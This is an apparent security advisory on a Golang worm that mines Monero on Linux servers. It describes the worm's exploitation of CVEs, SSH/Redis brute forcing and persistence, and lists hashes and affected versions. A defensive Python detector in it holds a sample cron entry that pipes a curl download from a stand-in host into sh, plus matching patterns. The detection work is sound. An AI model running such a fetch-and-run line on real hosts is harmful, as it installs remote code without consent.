Golang Mining Worm Targeting Linux Servers

A new form of malware has been spotted whose main purpose is the fraudulent mining of the Monero (XMR) cryptocurrency.

The worm spreads by attempting to exploit four web application vulnerabilities, or by brute-forcing Secure Shell (SSH) and Redis database services on the target system using a hardcoded set of credentials. Once the worm is established on the system, it downloads and executes three scripts.

The first script contains a set of installation instructions, while the second and third scripts contain the code and configuration for the cryptocurrency miner. When the first script executes, it attempts to carry out the following activities:

  • The script attempts to disable security features including SELinux.
  • A scheduled job is created that downloads and runs the installation script every fifteen minutes in order to maintain persistence.
  • All processes with a CPU usage greater than 30% are killed.
  • The script attempts to connect to every SSH host known to the compromised system and execute the payload on each.
  • The cryptocurrency miner is installed and run as a service.

The malware also blocks outgoing traffic on ports 3333, 5555, 7777 and 9999; F5 says this is likely because those ports are used by other cryptocurrency miners.
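The behaviours listed above (a cron job re-fetching the installer every 15 minutes, outbound blocks on the four miner ports, and SELinux switched off) are host-level indicators a defender can check for. The following is an added example, not code from the original post or from F5; the crontab, iptables and SELinux samples are constructed, and the URL placeholder.invalid is a stand-in, not a real indicator.

```python
import re

# Constructed samples standing in for `crontab -l` / /etc/cron.d output,
# `iptables -S OUTPUT` and /etc/selinux/config taken from a suspect host.
SAMPLE_CRON = [
    "0 2 * * * /usr/sbin/logrotate /etc/logrotate.conf",
    "*/15 * * * * curl -fsSL http://placeholder.invalid/install.sh | sh",
]
SAMPLE_IPTABLES = [
    "-A OUTPUT -p tcp -m tcp --dport 443 -j ACCEPT",
    "-A OUTPUT -p tcp -m tcp --dport 3333 -j DROP",
    "-A OUTPUT -p tcp -m tcp --dport 9999 -j DROP",
]
SAMPLE_SELINUX = "# SELinux state\nSELINUX=disabled\nSELINUXTYPE=targeted\n"

MINER_PORTS = {3333, 5555, 7777, 9999}  # egress ports the advisory says the worm blocks
# "*/N * * * * ... curl|wget ... | sh": re-fetch of a remote script into a shell.
CRON_RE = re.compile(r"^\*/(\d+)\s+\*\s+\*\s+\*\s+\*\s+.*\b(curl|wget)\b.*\|\s*(ba)?sh\b")
# Outbound DROP/REJECT rule with an explicit destination port.
IPT_RE = re.compile(r"-A OUTPUT\b.*--dport\s+(\d+)\b.*-j\s+(DROP|REJECT)\b")

def suspicious_cron(lines):
    """Cron entries that pull and run a remote script at least every 15 minutes."""
    return [l.strip() for l in lines
            if (m := CRON_RE.search(l.strip())) and int(m.group(1)) <= 15]

def blocked_miner_ports(rules):
    """Ports from the worm's block list that have an outbound DROP/REJECT rule."""
    ports = set()
    for rule in rules:
        m = IPT_RE.search(rule)
        if m and int(m.group(1)) in MINER_PORTS:
            ports.add(int(m.group(1)))
    return ports

def selinux_disabled(config_text):
    """True if /etc/selinux/config has been switched to SELINUX=disabled."""
    return any(line.strip().partition("=")[::2] == ("SELINUX", "disabled")
               for line in config_text.splitlines())

def assess(cron_lines, iptables_rules, selinux_config):
    """Run all three checks; an empty list means none of the indicators matched."""
    findings = [f"persistence: remote-script cron job: {e}" for e in suspicious_cron(cron_lines)]
    ports = blocked_miner_ports(iptables_rules)
    if ports:
        findings.append(f"egress block on miner pool ports: {sorted(ports)}")
    if selinux_disabled(selinux_config):
        findings.append("SELinux set to disabled")
    return findings

for finding in assess(SAMPLE_CRON, SAMPLE_IPTABLES, SAMPLE_SELINUX):
    print(finding)
```

Any single finding deserves a closer look at the host; all three together match the installation script's behaviour as described above.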

For further information, see the following CVE entries:

  • CVE-2019-9082
  • CVE-2019-3396
  • CVE-2018-7600

Indicators of Compromise

MD5 File Hashes

  • 6dcbd7ff8aeeb8e9fff861cbea912c2d

SHA1 File Hashes

  • ae01eaa4b42a99b9efbfa561ce16b971ec9e4b3a

SHA256 File Hashes

  • b6703bbc7b416cfcc1c7dbb3cc9a444dfa615e4a59e32b419d259fb7a20b9f12

Affected Platforms

Linux servers with one or more of the following enabled or installed:

  • SSH
  • Redis Database services – All versions
  • ThinkPHP – Versions prior to 3.2.4
  • Atlassian Confluence Server and Confluence Data Center:
    • Versions prior to 6.6.12
    • Versions from 6.7.0 prior to version 6.12.3
    • Versions 6.13.0 prior to version 6.13.3
    • Version 6.14.0 prior to 6.14.2
  • Drupal:
    • Versions 8.2.x and earlier
    • Versions 7.x prior to version 7.58
    • Versions 8.3.x prior to version 8.3.9
    • Versions 8.4.x prior to version 8.4.6
    • Versions 8.5.x prior to version 8.5.1

Jason Davies

UK based technology professional, with an interest in computer security and telecoms.
